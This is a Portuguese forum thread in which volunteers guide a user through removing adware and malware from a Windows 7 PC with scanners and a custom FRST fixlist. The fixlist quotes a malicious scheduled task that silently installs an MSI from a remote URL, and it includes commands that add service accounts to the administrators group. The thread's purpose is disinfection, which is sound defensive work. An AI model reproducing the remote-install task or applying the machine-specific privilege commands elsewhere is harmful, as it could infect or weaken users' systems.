Logo Hardware.com.br
Komm
Komm Cyber Highlander Registrado
12.8K Mensagens 2.7K Curtidas

Ameaça Avast

#1 Por Komm 07/03/2017 - 19:11
Clareol disse:
Prezados Técnicos
Estou executando o eset online, porém ontem ficou 11 horas passando e achei que estava travado, pois ficar na parte MEMÓRIA OPERACIONAL e não saía, aí eu fechei (não houve log e haviam 7 ameaças) e comecei outra vez hoje, já está com 5h de escaneamento já na parte MEMÓRIA OPERACIONAL e achou apenas 1 ameaça.
Deixo executar até parar(se é que vai parar)... o que eu faço????


As condições de escaneamento são as mesmas da primeira passada de 11 horas e que não logrou êxito, logo as consequências serão iguais.
Portanto sugiro parar agora o escaneamento com o ESET Online Scanner.

As ferramentas que sugeri são rápidas de passar. Se forem executadas sequencialmente, em uma hora o escaneamento termina.
A JRT tem o costume de empacar; se não terminar em meia hora, você a aborta.
Poste os logs de remoção pra gente, ok?

[]s.
computador modo virus reinicio pegou ameaca avast passei
Komm
Komm Cyber Highlander Registrado
12.8K Mensagens 2.7K Curtidas
#16 Por Komm
08/03/2017 - 19:23
Clareol disse:
Prezados Técnicos
Estou executando o eset online, porém ontem ficou 11 horas passando e achei que estava travado, pois ficar na parte MEMÓRIA OPERACIONAL e não saía, aí eu fechei (não houve log e haviam 7 ameaças) e comecei outra vez hoje, já está com 5h de escaneamento já na parte MEMÓRIA OPERACIONAL e achou apenas 1 ameaça.
Deixo executar até parar(se é que vai parar)... o que eu faço????


As condições de escaneamento são as mesmas da primeira passada de 11 horas e que não logrou êxito, logo as consequências serão iguais.
Portanto sugiro parar agora o escaneamento com o ESET Online Scanner.

As ferramentas que sugeri são rápidas de passar. Se forem executadas sequencialmente, em uma hora o escaneamento termina.
A JRT tem o costume de empacar; se não terminar em meia hora, você a aborta.
Poste os logs de remoção pra gente, ok?

[]s.
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#17 Por TmfeijoMMonr...
08/03/2017 - 19:32
Boa noite ! Prezada regente autora

Como não peguei logo de inicio ; seu caso.
Começaremos da estaca zero. Portanto siga ( podes seguir tranquilamente com calma e uma por uma ):




De início rode o antivírus malwarebytes; depois o eset on line e o combofix .

Para um devido e extraordinário expediente :

Execute-os :
Malwarebytes seguindo este tutorial ( cfe. acima ):http://www.caixadedicas.com/2009/10/tutorial-do-malwarebytes-anti-malware.html

Eset on line ( cfe. acima ); marcando permitir e em configurações avançadas marque todas as opções .
https://www.eset.com/int/home/online-scanner/

E rode o combofix ( cfe. acima ):
http://www.bleepingcomputer.com/download/combofix/


PS : Podes rodar as 3 ferramentas acima com tranquilidade , com calma , uma por uma e publique aqui os logs gerados .
Fazeremos uma hiper faxina minuciosa em seu pc . O que vc menos imagina; será encontrado e removido aí .


E finalizando com estas duas abaixo no mesmo nível deste expediente acima :
Adwcleaner:
https://toolslib.net/downloads/viewdownload/1-adwcleaner/
JRT:
https://br.malwarebytes.com/junkwareremovaltool/

Apenas um sal-suporte na maior transparência possível :

https://www.hardware.com.br/comunidade/virus-gg/1443533/3.html



E apenas tbm um alerta ( leitura e boa ) analítico de cuidados recentemente técnicos-científicos de um analista :

Mas nada/nunca mesmo ( pois creio que futuramente será pior ) de DISM; pois é uma total enganação por parte da MS/perda de tempo em reparar o sistema win .
Digo com este atributo . Pois se não vejamos freneticamente e tecnicamente:

https://www.hardware.com.br/comunidade/consertar-windows/1409278/

Abraços
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#18 Por joram
08/03/2017 - 21:55
/_ Clareol _\

Está faltando diagnóstico do que está ocorrendo e,somente,os relatórios da FRST podem nos dar alguns detalhes.

Imagem
https://www.hardware.com.br/comunidade/v-t/1226830/

Siga as recomendações oficiais deste Tópico e poste: FRST.txt + Addition.txt
Disponibilize os relatórios em Cjoint.com ou utilize spoiler,cuja instrução está ao final daquela página.
Outra opçãohospedar os relatórios em Hébergement de fichiers, Security-x.fr.

[Abs]
Clareol
Clareol Novo Membro Registrado
9 Mensagens 3 Curtidas
#20 Por Clareol
08/03/2017 - 23:03
Komm disse:
Da olhada superficial do log:
- Restos do Baidu, Combofix, Panda, ESET...
- Kyubey, Reimage, alteração de policies, winsnare, chuvch...

É, tem coisa pra fazer aí.

Baixe o trio ZHPCleaner, JRT e AdwCleaner, execute-os, remova o que encontrarem e poste os logs:
https://www.nicolascoolman.com/fr/download/zhpcleaner/
https://br.malwarebytes.com/junkwareremovaltool/
https://www.malwarebytes.com/adwcleaner/

Obs: Estranho o kyubey.exe aparecer como detectado no VirusTotal pelo Malwarebytes e não ter sido removido por ele.

[]s.

Caro @Komm
Seguem os logs.

Anexos

AdwCleaner[C0].txt
JRT.txt
ZHPCleaner.txt
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#21 Por TmfeijoMMonr...
08/03/2017 - 23:17
Boa noite ! Prezada regente plena; autora

Execute agora novamente o combofix, o malwarebytes e a eset on line cfe. acima .
Já podemos tbm rodar a DEL FIX para ir já removendo estas 3 ferramentas já executadas.
Depois usaremos a mesma ( a DEL ) novamente .
Mas apenas marque desinstalar ferramentas de desinfecção .

https://toolslib.net/downloads/viewdownload/2-delfix/


Ps: Um detalhe importante . Não assinale redefinir configurações do sistema; pois voltará ao sistema operacional ainda parcialmente infectado cfe. as ferramentas acima o desinfectou; inclusive haverá contestações negligentes aqui ao contrário/no que tange disto/isto .

https://www.hardware.com.br/comunidade/erro-certificado/1444917/

https://www.hardware.com.br/comunidade/ameaca-avast/1444873/1.html

Abraços

TmfeijoMMonroe disse:
Boa noite ! Prezada regente autora

Ok no aguardo.
Rode a JRT e o adwcleaner .
https://pt.malwarebytes.com/junkwareremovaltool/
https://www.malwarebytes.com/adwcleaner/

Desinstale o spybot and destroy com o revo uninstaller .

http://www.revouninstaller.com/revo_uninstaller_free_download.html

https://www.hardware.com.br/comunidade/virus-gg/1443533/



Abraços


TmfeijoMMonroe disse:
Boa noite ! Prezada regente autora

Como não peguei logo de inicio ; seu caso.
Começaremos da estaca zero. Portanto siga ( podes seguir tranquilamente com calma e uma por uma ):




De início rode o antivírus malwarebytes; depois o eset on line e o combofix .

Para um devido e extraordinário expediente :

Execute-os :
Malwarebytes seguindo este tutorial ( cfe. acima ):http://www.caixadedicas.com/2009/10/tutorial-do-malwarebytes-anti-malware.html

Eset on line ( cfe. acima ); marcando permitir e em configurações avançadas marque todas as opções .
https://www.eset.com/int/home/online-scanner/

E rode o combofix ( cfe. acima ):
http://www.bleepingcomputer.com/download/combofix/


PS : Podes rodar as 3 ferramentas acima com tranquilidade , com calma , uma por uma e publique aqui os logs gerados .
Fazeremos uma hiper faxina minuciosa em seu pc . O que vc menos imagina; será encontrado e removido aí .


E finalizando com estas duas abaixo no mesmo nível deste expediente acima :
Adwcleaner:
https://toolslib.net/downloads/viewdownload/1-adwcleaner/
JRT:
https://br.malwarebytes.com/junkwareremovaltool/

Apenas um sal-suporte na maior transparência possível :

https://www.hardware.com.br/comunidade/virus-gg/1443533/3.html


Abraços
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#22 Por joram
08/03/2017 - 23:33
/_ Boa Noite! Clareol _\

> Desinstale: Reimage Repair <<

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i5 CPU 750 @ 2.67GHz
Percentagem de memória em uso: 74%
---
---
> A percentagem de memória em uso,está alta! Isto provoca lentidão ou travamentos.

> Copie estas informações que estão no spoiler,para o Bloco de Notas.
> Salve-as com o nome fixlist. << Texto ou Unicode
> Salve-as no desktop! ( Área de trabalho ... )
> Mova a ferramenta FRST ao desktop,pois a mesma está em pasta errada! (C:\Users\Jose Augusto\Downloads) <<

[spoiler]start
CloseProcesses:
ShellExecuteHooks: Sem Nome - {005E7630-F1AE-11E6-8235-64006A5CFC23} - -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\¿ìѹ\X86\KZipShell.dll [2017-02-15] ()
GroupPolicy\User: Restrição ? <======= ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO
HKU\S-1-5-21-2876032054-3948035702-3147299479-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131317481660424094&GUID=00000000-0000-0000-0000-000000000000
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2876032054-3948035702-3147299479-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2876032054-3948035702-3147299479-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.br/
SearchScopes: HKLM -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2876032054-3948035702-3147299479-1000 -> DefaultScope {4FB2AA53-8919-4D5A-96BA-34D7DEFD14D0} URL = hxxp://www.google.com/search?hl=en&q={searchTerms}&rlz=
SearchScopes: HKU\S-1-5-21-2876032054-3948035702-3147299479-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2876032054-3948035702-3147299479-1000 -> {4FB2AA53-8919-4D5A-96BA-34D7DEFD14D0} URL = hxxp://www.google.com/search?hl=en&q={searchTerms}&rlz=
SearchScopes: HKU\S-1-5-21-2876032054-3948035702-3147299479-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-2876032054-3948035702-3147299479-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL =
Toolbar: HKU\.DEFAULT -> Sem Nome - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Nenhum Arquivo
FF NewTab: Mozilla\Firefox\Profiles\7i1p2ovq.default -> hxxp://www.youndoo.com/?z=b32319295cb0857ef182974g8zab7mag4m6cat0wfe&from=wak&uid=WDCXWD3200AAKS-75L9A0_WD-WMAV2DF3045330453&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\7i1p2ovq.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\7i1p2ovq.default -> youndoo
FF Homepage: Mozilla\Firefox\Profiles\7i1p2ovq.default -> hxxp://www.youndoo.com/?z=b32319295cb0857ef182974g8zab7mag4m6cat0wfe&from=wak&uid=WDCXWD3200AAKS-75L9A0_WD-WMAV2DF3045330453&type=hp
FF Keyword.URL: Mozilla\Firefox\Profiles\7i1p2ovq.default -> hxxp://start.myplaycity.com/results.php?category=web&s=
FF HKLM\...\Firefox\Extensions: [[EMAIL]sp@avast.com[/EMAIL]] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-09-14]
CHR Profile: C:\Users\Jose Augusto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-03-07] <==== ATENÇÃO
R2 KuaizipUpdateChecker; C:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll [219032 2017-02-15] ()
S2 WinSnare; "C:\Users\Jose Augusto\AppData\Roaming\WinSnare\WinSnare.dll" [X] <==== ATENÇÃO
R1 91490aedbbda70f53c677c5d3f090b81; C:\Windows\system32\drivers\91490aedbbda70f53c677c5d3f090b81.sys [81616 2017-02-15] (IAS50Q) <==== ATENÇÃO
R2 KuaiZipDrive; C:\Windows\system32\drivers\KuaiZipDrive.sys [68128 2017-02-15] (WinMount International Inc)
S1 Bfilter; \??\C:\Windows\System32\drivers\Bfilter.sys [X]
S1 Bfmon; \??\C:\Windows\System32\drivers\Bfmon.sys [X]
S0 Bhbase; System32\drivers\Bhbase.sys [X]
S3 BHipsEx; \??\C:\Windows\System32\drivers\BHipsEx.sys [X]
S1 Bnbase; System32\drivers\bnbasex.sys [X]
S1 Bndef; \??\C:\Windows\System32\drivers\bndef.sys [X]
S1 Bprotect; \??\C:\Windows\System32\drivers\Bprotect.sys [X]
S3 catchme; \??\C:\Users\JOSEAU~1\AppData\Local\Temp\catchme.sys [X] <==== ATENÇÃO
S0 DasBoot; \SystemRoot\system32\drivers\DasBoot.SYS [X]
S0 DasBootF; \SystemRoot\system32\drivers\DasBootF.SYS [X]
S3 EverestDriver; \??\C:\Program Files\Lavalys\EVEREST Ultimate Edition\kerneld.wnt [X]
S0 gbpddreg; system32\drivers\gbpddreg32.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S2 Proteq; não ImagePath
S0 PRSBDRVR; \SystemRoot\system32\drivers\PRSBDRVR.SYS [X]
S3 RimUsb; System32\Drivers\RimUsb.sys [X]
2017-03-07 20:49 - 2017-03-07 20:51 - 12102120 _____ (Reimage) C:\Users\Jose Augusto\AppData\Local\Temp\ReimagePackage.exe
2017-03-07 19:56 - 2017-03-07 20:48 - 00000000 ____D C:\Program Files\BikaQRss
2017-03-07 19:56 - 2017-03-07 20:31 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Kyubey
2017-03-07 19:56 - 2017-03-07 19:56 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\WinSAPSvc
2017-03-07 15:11 - 2017-03-07 15:11 - 00098816 ____R () C:\Users\Jose Augusto\AppData\Local\Temp\_MEI51202\*.pyd
2017-03-07 15:11 - 2017-03-07 15:11 - 00110080 ____R () C:\Users\Jose Augusto\AppData\Local\Temp\_MEI51202\*.dll
2017-03-07 19:56 - 2017-03-07 19:56 - 00000000 ____D C:\Program Files\MIO
2017-03-02 18:22 - 2017-03-07 15:09 - 00000000 ____D C:\Program Files\Spybot - Search & Destroy
2017-03-02 18:22 - 2017-03-07 15:05 - 00000000 ____D C:\Users\Todos os Usuários\Spybot - Search & Destroy
2017-03-02 18:22 - 2017-03-07 15:05 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-02-15 13:05 - 2017-02-15 13:05 - 00000000 ____D C:\Users\Public\Documents\Guid
2017-02-15 13:05 - 2017-02-15 13:05 - 00000000 ____D C:\Users\Jose Augusto\AppData\Local\Perertionstanudom
2017-02-15 13:00 - 2017-02-15 13:01 - 00000000 ____D C:\Users\Jose Augusto\AppData\Local\app
2017-02-15 12:59 - 2017-02-15 16:52 - 00000000 ____D C:\Users\Jose Augusto\AppData\Local\WikiThemes
2017-02-15 12:59 - 2017-02-15 13:00 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\KuaiZip
2017-02-15 12:59 - 2017-02-15 12:58 - 00068128 _____ (WinMount International Inc) C:\Windows\system32\Drivers\KuaiZipDrive.sys
2017-02-15 12:58 - 2017-02-15 18:11 - 00000000 ____D C:\Program Files\¿ìѹ
2017-02-15 12:58 - 2017-02-15 12:58 - 00219032 _____ () c:\program files\¿ìñ¹\x86\kuaizipupdatechecker.dll
2017-02-15 12:58 - 2017-02-15 12:58 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Softlink
2017-02-15 12:56 - 2017-02-17 13:33 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Event Monitor
2017-02-15 12:56 - 2017-02-15 12:56 - 00000000 ____D C:\Users\Jose Augusto\AppData\Local\tuto_monetize_120170124
2017-02-15 12:55 - 2017-02-15 15:41 - 00000000 ____D C:\Users\Todos os Usuários\{cd7-a8-c8-684d4-b6205-689a-4af0a}
2017-02-15 12:55 - 2017-02-15 15:41 - 00000000 ____D C:\ProgramData\{cd7-a8-c8-684d4-b6205-689a-4af0a}
2017-02-15 12:55 - 2017-02-15 12:55 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\gplyra
2017-02-15 12:54 - 2017-02-15 12:54 - 00000000 _____ C:\TOSTACK
2017-02-15 12:53 - 2017-02-15 13:01 - 00000000 ____D C:\Windows\system32\SSL
2017-02-15 12:52 - 2017-02-15 16:10 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Shogersh
2017-02-15 12:42 - 2017-02-15 12:42 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Intelore
2017-02-15 12:27 - 2017-02-15 12:27 - 00000000 ____D C:\Users\Jose Augusto\AppData\Roaming\Passware
2016-12-26 17:23 - 2011-06-26 03:45 - 00256000 _____ C:\Windows\PEV.exe
2016-12-26 17:23 - 2010-11-07 14:20 - 00208896 _____ C:\Windows\MBR.exe
2016-12-26 17:23 - 2009-04-20 01:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-12-26 17:23 - 2000-08-30 21:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-12-26 17:23 - 2000-08-30 21:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-12-26 17:23 - 2000-08-30 21:00 - 00098816 _____ C:\Windows\sed.exe
2016-12-26 17:23 - 2000-08-30 21:00 - 00080412 _____ C:\Windows\grep.exe
2016-12-26 17:23 - 2000-08-30 21:00 - 00068096 _____ C:\Windows\zip.exe
Task: {0F661188-BA4A-414F-8453-A44B57E07687} - System32\Tasks\Anbiwardzejack => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AAKS-75L9A0_WD-WMAV2DF3045330453&v=2017215 /q <==== ATENÇÃO
Task: {451D095E-1940-4711-9BF6-4BDE14E2A6F5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {67A6AF21-B5B8-413D-8A55-396199555085} - System32\Tasks\{CD1FAF1C-099B-4A0B-994F-4CD45BC5859A} => pcalua.exe -a "C:\Users\Jose Augusto\AppData\Roaming\qone8\UninstallManager.exe" -c -ptid=kmp
Task: {9BF97927-C413-4A6D-9945-4B7913128712} - System32\Tasks\RunAtStartup => C:\Users\Jose Augusto\AppData\Roaming\Event Monitor\em.exe <==== ATENÇÃO
Task: {A18B20A4-DCBC-4E83-ABA0-25A27CD96518} - System32\Tasks\{1C093C4F-8A55-4F74-8245-9D2882C6C5AA} => pcalua.exe -a "C:\Windows\TEMP\avast_ash\Adobe AIR\AdobeAIRInstaller.exe" -d "C:\Program Files\AVAST Software\Avast" <==== ATENÇÃO
Task: {B591C12D-DFAE-446F-9EB9-C6ABF89958D5} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\F85A~1\X86\Update.exe <==== ATENÇÃO
Task: {CA991082-A172-40E4-A9CD-8DD50107BBDA} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATENÇÃO
Task: {D2D47E8A-A648-4401-92B2-D1C09D5A1A0E} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATENÇÃO
ShortcutWithArgument: C:\Users\Jose Augusto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Users\Jose Augusto\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Users\Jose Augusto\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
AlternateDataStreams: C:\Program Files\GbPlugin:IncompleteStartProcessProtection.cnt [8]
AlternateDataStreams: C:\Program Files\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg== [32]
AlternateDataStreams: C:\Windows\system32\drivers:GbpKmAp.lst [365]
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2174]
AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
CMD: net localgroup administradores "serviço local" /add
CMD: net localgroup administradores "serviço de rede" /add
CMD: netsh winsock reset catalog
CMD: netsh advfirewall set allprofiles state on
CMD: netsh interface ip delete arpcache
CMD: netsh advfirewall reset
CMD: bitsadmin /reset /allusers
CMD: netsh int ip reset all
CMD: nbtstat -RR
CMD: nbtstat -R
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
CMD: sfc /scannow
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Hosts:
Reboot:
end[/spoiler]

> Execute FRST/FRST64 >> Clique "Corrigir" << Aguarde!
> Poste o relatório! (Fixlog.txt)
> Este e outros relatórios,podem ser encontrados na pasta: Disco Local (C) > FRST > Logs

Imagem
< Peço aos visitantes que não utilizem este script em outros computadores,sob risco de danos aos mesmos! >

[A+]

... editando! ( Remover instrução "Executar" ao canned)
... editando! ( Incluir comandos network e outros )
Komm
Komm Cyber Highlander Registrado
12.8K Mensagens 2.7K Curtidas
#23 Por Komm
08/03/2017 - 23:43
Clareol, antes de tentar pela enésima vez o que o TmFeijo lhe pede, responda-me uma pergunta:

O seu log do ZHPCleaner não mostra remoções, só detecções.
Você clicou no botão Remover do ZHPCleaner? Se não, seria bom executá-lo novamente e clicar nesse botão...

Mesmo que boa parte dos malwares do seu micro já tenha sido removida, sugiro a você fazer o uso da fixlist do joram na FRST.
É um procedimento rápido e tem efeito benéfico para não haver reinfecção, pois é personalizado para seu micro.

Deixarei a cargo dele o resto de remoção que seja necessária.

**** Edit: O nome exato do botão é Reparar.

[]s.
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#24 Por TmfeijoMMonr...
08/03/2017 - 23:45
Boa noite ! Prezada regente autora


No que tange o antivírus malwarebytes; que ainda está em fase de testes como AV; rode-o novamente ; pois de modo que seria seguindo este tutorial:

http://www.caixadedicas.com/2009/10/tutorial-do-malwarebytes-anti-malware.html

Editando:
Já no que tange a ZHPCleaner; queira por fineza primar o botão reparar ( função com nome correto no software ); antes dos necessários feitos acima .
Pois anteriormente não fora devidamente orientada . Não é mesmo ?

E mantido o destrinchar; pois o Komm; nem lê direito como sempre os tópicos assim como aqui:

https://www.hardware.com.br/comunidade/administrador-desativei/1445683/

E um detalhe simples neste tópico supra. O user disse que não tem o CD do windows dez e logo o mesmo o questiona se ele tem !?eek.pngrolleyes.pngpolicia.gifmostrando_dentes.pngisso_ai.png


Abraços

Clareol disse:
Versão do programa 17.2.2288(build 17.2.3419.0)
Versão das definições de vírus: 170307-5
Número de Definições: 6.331.991

Já passei:
eset online
malwarebytes
(Malwarebytes
www.malwarebytes.com

-Detalhes de registro-
Data da análise: 07/03/17
Hora da análise: 12:23
Arquivo de registro: Malwarebytes.txt
Administrador: Sim

-Informação do software-
Versão: 3.0.6.1469
Versão de componentes: 1.0.75
Versão do pacote de definições: 1.0.1447
Licença: Versão de avaliação

-Informação do sistema-
Sistema operacional: Windows 7 Service Pack 1
CPU: x86
Sistema de arquivos: NTFS
Usuário: ARC-PC\ARC

-Resumo da análise-
Tipo de análise: Análise de Ameaças
Resultado: Concluído
Objetos verificados: 366110
Tempo decorrido: 5 min, 57 seg

-Opções da análise-
Memória: Habilitado
Inicialização: Habilitado
Sistema de arquivos: Habilitado
Arquivos compactados: Habilitado
Rootkits: Desabilitado
Heurística: Habilitado
PUP: Habilitado
PUM: Habilitado

-Detalhes da análise-
Processo: 0
(Nenhum item malicioso detectado)

Módulo: 0
(Nenhum item malicioso detectado)

Chave de registro: 0
(Nenhum item malicioso detectado)

Valor de registro: 0
(Nenhum item malicioso detectado)

Dados de registro: 0
(Nenhum item malicioso detectado)

Fluxo de dados: 0
(Nenhum item malicioso detectado)

Pasta: 0
(Nenhum item malicioso detectado)

Arquivo: 0
(Nenhum item malicioso detectado)

Setor físico: 0
(Nenhum item malicioso detectado)


(end))

avast na reinicialiação
ccleaner
spyboot
housecall


TmfeijoMMonroe disse:
Boa noite ! Prezada regente autora

Ok no aguardo.
Rode a JRT e o adwcleaner .
https://pt.malwarebytes.com/junkwareremovaltool/
https://www.malwarebytes.com/adwcleaner/

Desinstale o spybot and destroy com o revo uninstaller .

http://www.revouninstaller.com/revo_uninstaller_free_download.html

https://www.hardware.com.br/comunidade/virus-gg/1443533/


Abraços
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#26 Por TmfeijoMMonr...
09/03/2017 - 00:09
Bom dia ! Prezada regente autora


Com toda transparência minha .Vossa pessoa chegou a ler a total transparência possível ? smile.pngsmile.pngbig_green.png
Na página one .
Aí você conclui os resultados devidos e técnicos .atencao_regras.gifpolicia.gifisso_ai.pngme_espantei.pngboa.gif

Ps: No que diz respeito ao malwarebytes cfe. supra; será uma deep varredura.

Abraços

TmfeijoMMonroe disse:
Boa noite ! Prezada regente autora

Ok no aguardo.
Rode a JRT e o adwcleaner .
https://pt.malwarebytes.com/junkwareremovaltool/
https://www.malwarebytes.com/adwcleaner/

Desinstale o spybot and destroy com o revo uninstaller .

http://www.revouninstaller.com/revo_uninstaller_free_download.html

https://www.hardware.com.br/comunidade/virus-gg/1443533/


Abraços


Komm disse:
Clareol, antes de tentar pela enésima vez o que o TmFeijo lhe pede, responda-me uma pergunta:

O seu log do ZHPCleaner não mostra remoções, só detecções.
Você clicou no botão Remover do ZHPCleaner? Se não, seria bom executá-lo novamente e clicar nesse botão...

Mesmo que boa parte dos malwares do seu micro já tenha sido removida, sugiro a você fazer o uso da fixlist do joram na FRST.
É um procedimento rápido e tem efeito benéfico para não haver reinfecção, pois é personalizado para seu micro.

Deixarei a cargo dele o resto de remoção que seja necessária.

[]s.


TmfeijoMMonroe disse:
Boa noite ! Prezada regente autora


No que tange o antivírus malwarebytes; que ainda está em fase de testes como AV; rode-o novamente ; pois de modo que seria seguindo este tutorial:

http://www.caixadedicas.com/2009/10/tutorial-do-malwarebytes-anti-malware.html

Editando:
Já no que tange a ZHPCleaner; queira por fineza primar o botão reparar ( função com nome correto no software ); antes dos necessários feitos acima .
Pois anteriormente não fora devidamente orientada . Não é mesmo ?

Abraços


Komm disse:
Que bom que antes de dormir fui consultar seus logs, Clareon.


Boa noite. smile.png

[]s.
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#28 Por TmfeijoMMonr...
09/03/2017 - 19:28
Boa noite ! Prezada regente plena; autora

Vamos com calma . A principio:
Execute agora novamente o combofix, o malwarebytes ( novamente cfe. acima pois será um scan deep ) e a eset on line cfe. acima .
Já podemos tbm rodar a DEL FIX para ir já removendo estas 3 ferramentas já executadas. Que são a JRT, o adwcleaner e até então tbm a ZHPCleaner cfe. abaixo.
Depois usaremos a mesma ( a DEL ) novamente .
Mas apenas marque desinstalar ferramentas de desinfecção .

https://toolslib.net/downloads/viewdownload/2-delfix/


Ps: Um detalhe importante . Não assinale redefinir configurações do sistema; pois voltará ao sistema operacional ainda parcialmente infectado cfe. as ferramentas acima o desinfectou; inclusive haverá contestações negligentes aqui ao contrário/no que tange disto/isto .

Mas antes tbm rode novamente a ZHPCleaner e prime o botão reparar da mesma . Só que antes faça um novo scan .


Editando/editado cfe. acima:

Já no que tange a ZHPCleaner; queira por fineza primar o botão reparar ( função com nome correto no software ); antes dos necessários feitos acima .
Pois anteriormente não fora devidamente orientada . Não é mesmo ?



Abraços



Clareol disse:
Vixi Maria
Vocês me confundiram toda... por favor, me esclareçam o que tenho que fazer!!!!
joram
